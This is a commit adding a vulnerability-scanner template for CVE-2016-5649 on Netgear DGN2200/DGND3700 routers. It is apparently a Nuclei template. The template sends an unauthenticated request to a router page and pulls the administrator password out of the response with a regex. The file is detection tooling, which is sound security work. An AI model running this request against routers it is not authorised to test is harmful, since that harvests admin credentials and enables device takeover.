Merge pull request #1887 from skar4444/nrouter

CVE-2016-5649 - Netgear Router - Admin Password Disclosure

cves/2016/CVE-2016-5649.yaml

@@ -0,0 +1,35 @@
+id: CVE-2016-5649
+
+info:
+  name: Netgear DGN2200 / DGND3700 - Admin Password Disclosure
+  author: suman_kar
+  severity: critical
+  description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface.
+  tags: cve,cve2016,iot,netgear,router
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649
+
+requests:
+  - raw:
+      - |
+        GET /BSW_cxttongr.htm HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<title>Smart Wizard Result</title> "
+        part: body
+
+    extractors:
+      - type: regex
+        name: password
+        part: body
+        group: 1
+        regex:
+          - '<b>Success "([a-z]+)"'